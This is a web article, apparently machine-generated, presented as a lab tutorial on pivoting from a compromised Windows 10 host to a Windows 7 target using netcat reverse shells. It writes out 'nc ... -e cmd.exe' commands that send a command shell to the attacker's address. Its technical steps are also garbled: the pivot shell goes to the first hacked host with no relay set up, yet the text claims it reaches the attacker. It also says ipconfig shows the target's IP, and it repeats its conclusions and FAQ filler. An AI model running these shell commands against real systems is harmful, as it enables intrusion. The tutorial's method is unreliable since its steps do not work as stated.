Pivoting Without Metasploit To Get Reverse Shell

by ADMIN 49 views

Introduction

Pivoting is a crucial step in penetration testing and red teaming, allowing you to move from an initial compromised host to other hosts on the network. In this article, we will explore pivoting without using Metasploit, focusing on obtaining a reverse shell. We will use a lab environment with three machines: an attacker machine (Kali Linux), a 1st hacked machine (Windows 10), and a target machine (Windows 7).

Lab Environment

Our lab environment consists of three machines:

  • Attacker Machine (Kali Linux): 192.168.1.81
  • 1st Hacked Machine (Windows 10): 10.10.10.130
  • Target Machine (Windows 7): 10.10.10.135

Step 1: Initial Compromise

The first step is to compromise the 1st hacked machine (Windows 10). This can be achieved through various means, such as exploiting a vulnerability, using a phishing attack, or exploiting a misconfigured service. For the purpose of this exercise, let's assume we have already compromised the 1st hacked machine.

Step 2: Establishing a Reverse Shell

Once we have compromised the 1st hacked machine, we need to establish a reverse shell to the attacker machine (Kali Linux). A reverse shell is a type of shell that connects back to the attacker machine, allowing us to interact with the compromised host remotely.

To establish a reverse shell, we can use a tool like nc (Netcat) or python -c. Here's an example of how to use nc to establish a reverse shell:

nc -lvnp 4444

This will start a listener on port 4444, waiting for a connection from the 1st hacked machine.

On the 1st hacked machine, we can use the following command to connect back to the attacker machine:

nc 192.168.1.81 4444 -e cmd.exe

This will establish a reverse shell to the attacker machine, allowing us to interact with the compromised host remotely.

Step 3: Pivoting to the Target Machine

Now that we have established a reverse shell to the 1st hacked machine, we can pivot to the target machine (Windows 7). To do this, we need to obtain a new IP address on the target machine's network.

We can use the ipconfig command to obtain the IP address of the target machine:

ipconfig

This will display the IP address of the target machine, which we can use to connect to it.

Step 4: Establishing a New Reverse Shell

Once we have obtained the IP address of the target machine, we can establish a new reverse shell to the attacker machine. We can use the same nc command to establish a new listener on a different port:

nc -lvnp 5555

On the target machine, we can use the following command to connect back to the attacker machine:

nc 10.10.10.130 5555 -e cmd.exe

This will establish a new reverse shell to the attacker machine, allowing us to interact with the target machine remotely.

Conclusion

In this article, we have explored pivoting without using Metasploit to obtain a reverse shell. We have used a lab environment with three machines: an attacker machine (Kali Linux), a 1st hacked machine (Windows 10), and a target machine (Windows 7). We have established a reverse shell to the 1st hacked machine and then pivoted to the target machine, establishing a new reverse shell to the attacker machine.

Additional Tips and Tricks

  • Use a tool like nmap to scan the target machine's network and identify open ports.
  • Use a tool like smbclient to access the target machine's shares.
  • Use a tool like powershell to execute PowerShell commands on the target machine.

Common Mistakes to Avoid

  • Failing to establish a reverse shell to the 1st hacked machine.
  • Failing to obtain a new IP address on the target machine's network.
  • Failing to establish a new reverse shell to the attacker machine.

Conclusion

Q: What is pivoting in penetration testing?

A: Pivoting is a crucial step in penetration testing and red teaming, allowing you to move from an initial compromised host to other hosts on the network.

Q: Why do I need to establish a reverse shell to the 1st hacked machine?

A: Establishing a reverse shell to the 1st hacked machine allows you to interact with the compromised host remotely and perform further exploitation.

Q: How do I establish a reverse shell to the 1st hacked machine?

A: You can use a tool like nc (Netcat) or python -c to establish a reverse shell to the 1st hacked machine.

Q: What is the difference between a reverse shell and a bind shell?

A: A reverse shell connects back to the attacker machine, while a bind shell listens for a connection from the attacker machine.

Q: How do I pivot to the target machine?

A: To pivot to the target machine, you need to obtain a new IP address on the target machine's network and establish a new reverse shell to the attacker machine.

Q: What tools can I use to scan the target machine's network and identify open ports?

A: You can use a tool like nmap to scan the target machine's network and identify open ports.

Q: How do I access the target machine's shares?

A: You can use a tool like smbclient to access the target machine's shares.

Q: What are some common mistakes to avoid when pivoting without Metasploit?

A: Some common mistakes to avoid include failing to establish a reverse shell to the 1st hacked machine, failing to obtain a new IP address on the target machine's network, and failing to establish a new reverse shell to the attacker machine.

Q: How do I troubleshoot issues with pivoting without Metasploit?

A: You can use tools like tcpdump and wireshark to troubleshoot issues with pivoting without Metasploit.

Q: What are some best practices for pivoting without Metasploit?

A: Some best practices for pivoting without Metasploit include using a tool like nmap to scan the target machine's network and identify open ports, using a tool like smbclient to access the target machine's shares, and establishing a reverse shell to the 1st hacked machine before pivoting to the target machine.

Q: Can I use pivoting without Metasploit in a real-world scenario?

A: Yes, you can use pivoting without Metasploit in a real-world scenario, but it requires a good understanding of networking and system administration.

Q: How do I stay up-to-date with the latest pivoting techniques and tools?

A: You can stay up-to-date with the latest pivoting techniques and tools by following security blogs and attending security conferences.

Conclusion

Pivoting without using Metasploit requires a good understanding of networking and system administration. By following the steps outlined in this article and avoiding common mistakes, you can establish a reverse shell to a compromised host and then pivot to other hosts on the network. Remember to use tools like nmap and smbclient to scan the target machine's network and identify open ports, and establish a reverse shell to the 1st hacked machine before pivoting to the target machine.